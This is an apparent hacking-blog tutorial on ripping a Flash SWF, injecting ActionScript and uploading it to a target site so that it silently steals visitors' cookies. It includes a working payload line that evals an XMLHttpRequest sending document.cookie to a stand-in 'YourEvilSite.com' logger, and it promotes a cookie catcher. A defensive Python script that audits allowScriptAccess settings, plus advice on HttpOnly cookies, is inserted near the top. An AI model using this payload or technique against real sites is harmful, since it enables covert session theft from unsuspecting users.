Here is a tutorial on how to rip and edit an existing flash movie/game for use in XSS attacks. The objective is to steal cookies silently without changing the flash movie's behavior from the perspective of the user.
When a site allows you to upload .swf (Flash) files or to embed a Flash file as an object, it may be possible to create an XSS vulnerability, so long as the parameter allowScriptAccess=never is not specified in the embed code.
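As an added example (not part of the original post), here is a small Python audit script that scans a page's embed code for SWF objects whose allowScriptAccess is anything other than never, covering both the <embed allowScriptAccess="..."> form and the <object><param name="allowScriptAccess"> form. The HTML sample inside it is constructed, and the function names audit_swf_embeds and unsafe_swf_embeds are my own. A missing attribute is treated as sameDomain, which is Flash Player's default and is enough to let a same-origin upload reach the page's JavaScript.

```python
from html.parser import HTMLParser

# Constructed sample markup: three SWF embeds and one non-SWF embed.
SAMPLE_HTML = """
<embed src="/uploads/game.swf" width="400" height="300">
<object data="/uploads/movie.swf" type="application/x-shockwave-flash">
  <param name="allowScriptAccess" value="never">
</object>
<embed src="/uploads/banner.swf" allowScriptAccess="always" />
<embed src="/uploads/logo.png">
"""

FLASH_DEFAULT = "sameDomain"  # Flash Player's default when the attribute is absent


class _SwfEmbedScanner(HTMLParser):
    """Collects every SWF <embed>/<object> and its effective allowScriptAccess."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._object = None  # state for the currently open <object>, if any

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "embed":
            self._record("embed", a.get("src", ""), a.get("allowscriptaccess"))
        elif tag == "object":
            self._object = {"data": a.get("data", ""), "params": {}}
        elif tag == "param" and self._object is not None:
            self._object["params"][a.get("name", "").lower()] = a.get("value", "")

    def handle_endtag(self, tag):
        if tag == "object" and self._object is not None:
            obj, self._object = self._object, None
            # <object> may name the file via data= or via <param name="movie">
            src = obj["data"] or obj["params"].get("movie", "")
            self._record("object", src, obj["params"].get("allowscriptaccess"))

    def _record(self, kind, src, allow_script_access):
        if not src.lower().split("?")[0].endswith(".swf"):
            return  # only Flash content is in scope
        effective = (allow_script_access or FLASH_DEFAULT).strip().lower()
        self.findings.append({
            "tag": kind,
            "src": src,
            "allow_script_access": effective,
            "safe": effective == "never",
        })


def audit_swf_embeds(html):
    """Return one finding per SWF embed found in the markup, in document order."""
    scanner = _SwfEmbedScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


def unsafe_swf_embeds(html):
    """Return the src of every SWF embed that can call into page JavaScript."""
    return [f["src"] for f in audit_swf_embeds(html) if not f["safe"]]


if __name__ == "__main__":
    for f in audit_swf_embeds(SAMPLE_HTML):
        status = "ok" if f["safe"] else "FLAG"
        print(f"{status:4} {f['tag']:6} {f['src']} allowScriptAccess={f['allow_script_access']}")
```

On the sample, game.swf (no attribute) and banner.swf (always) are flagged while movie.swf (never) passes. Setting allowScriptAccess=never on any user-supplied SWF stops the ExternalInterface call from reaching the page; marking session cookies HttpOnly is a separate, complementary control, since document.cookie cannot read them even if script access is granted.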
Some tools needed:
A SWF file decompiler (link) (note: I have the full version, the demo is limited)
A FLA editor (I use Adobe Flash CS6)
Navigate to a page where a Flash movie or game loads, and either check the page source for the URL of the Flash file (ending in .swf) or, as shown below, use Firefox to go to Tools > Page Info > Media and use "Save As" to download it.
Once you have acquired the Sothink decompiler, open up the file you just downloaded and export it as a .fla file:
Open the .fla file in your editor (Adobe Flash CS6 in my case), select the first frame of the movie, and right-click > Actions. This will bring up the ActionScript editor.
Find the beginning of the ActionScript for the 'scene' and, before any other code, paste the following:
flash.external.ExternalInterface.call("eval", "var a = new XMLHttpRequest(); a.open('get', 'http://YourEvilSite.com/logger.php?cookie=' + document.cookie); a.send();");
From the File drop-down, select Export as Movie:
The file is now ready to be uploaded/embedded on your target site. It should operate as normal, but now, behind the scenes, whoever accesses it will have their cookies stolen. May I recommend a cookie catcher I prepared earlier!? (link).
Demo (cookie stealing code replaced with alert box): http://dfu123.comule.com/swfxss.swf
(If you find this useful, why not check out an advert below to support the blog? :O ) ~r0ng